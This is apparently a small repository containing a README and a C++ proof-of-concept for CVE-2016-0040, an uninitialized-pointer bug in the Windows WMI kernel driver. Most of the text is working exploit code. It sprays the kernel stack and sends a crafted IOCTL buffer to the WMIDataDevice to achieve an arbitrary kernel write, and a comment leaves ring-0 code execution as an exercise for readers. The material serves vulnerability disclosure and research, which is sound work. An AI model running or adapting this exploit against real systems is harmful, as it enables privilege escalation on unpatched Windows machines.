├── README.md └── poc.cc /README.md: -------------------------------------------------------------------------------- 1 | # cve-2016-0040 2 | 3 | poc for cve-2016-0040 bug found and exploited by Meysam Firozi @R00tkitSmm 4 | 5 | this poc help write arbitrary data to arbitrary address in windows kernel 6 | 7 | for more info see ny blog : 8 | http://ioctl.ir/index.php/2016/02/13/cve-2016-0040-story-of-uninitialized-pointer/ 9 | 10 | -------------------------------------------------------------------------------- /poc.cc: -------------------------------------------------------------------------------- 1 | // with this code we can write custom data to custom address in kernel 2 | // getting Ring0 code execution in this situation is so simple , exercise for readers 3 | #include 4 | #include 5 | 6 | typedef union { 7 | HANDLE Handle; 8 | ULONG64 Handle64; 9 | ULONG32 Handle32; 10 | } 11 | HANDLE3264, * PHANDLE3264; 12 | 13 | typedef struct { 14 | // 15 | // List of guid notification handles 16 | // 17 | ULONG HandleCount; 18 | ULONG Action; 19 | HANDLE /* PUSER_THREAD_START_ROUTINE */ UserModeCallback; 20 | HANDLE3264 UserModeProcess; 21 | HANDLE3264 Handles[20]; 22 | } 23 | WMIRECEIVENOTIFICATION, * PWMIRECEIVENOTIFICATION; 24 | 25 | #define RECEIVE_ACTION_CREATE_THREAD 2 // Mark guid objects as requiring 26 | 27 | typedef struct { 28 | IN VOID * ObjectAttributes; 29 | IN ACCESS_MASK DesiredAccess; 30 | 31 | OUT HANDLE3264 Handle; 32 | } 33 | WMIOPENGUIDBLOCK, * PWMIOPENGUIDBLOCK; 34 | 35 | #define IOCTL_WMI_RECEIVE_NOTIFICATIONS CTL_CODE(FILE_DEVICE_UNKNOWN, 0x51, METHOD_BUFFERED, FILE_WRITE_ACCESS) 36 | 37 | extern "C" ULONG STDCALL 38 | NtMapUserPhysicalPages( 39 | PVOID BaseAddress, 40 | ULONG NumberOfPages, 41 | PULONG PageFrameNumbers 42 | ); 43 | 44 | VOID SprayKernelStack() { 45 | BYTE buffer[4096]; 46 | memset(buffer, 'B', sizeof(buffer)); 47 | NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer); 48 | } 49 | 50 | int main() { 51 | DWORD dwBytesReturned; 52 | HANDLE threadhandle; 53 | WMIRECEIVENOTIFICATION buffer; 54 | CHAR OutPut[1000]; 55 | 56 | memset( &buffer, '\x41', sizeof(buffer)); // set ecx to 0x41414141 57 | buffer.HandleCount = 0; 58 | buffer.Action = RECEIVE_ACTION_CREATE_THREAD; 59 | buffer.UserModeProcess.Handle = GetCurrentProcess(); 60 | 61 | 62 | 63 | HANDLE hDriver = CreateFileA("\\\\.\\WMIDataDevice", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); 64 | if (hDriver != INVALID_HANDLE_VALUE) { 65 | while (TRUE) { 66 | SprayKernelStack(); 67 | 68 | if (!DeviceIoControl(hDriver, IOCTL_WMI_RECEIVE_NOTIFICATIONS, &buffer, sizeof(buffer), &OutPut, sizeof(OutPut), &dwBytesReturned, NULL)) { 69 | return 1; 70 | } 71 | } 72 | 73 | } 74 | 75 | return 0; 76 | } 77 | 78 | --------------------------------------------------------------------------------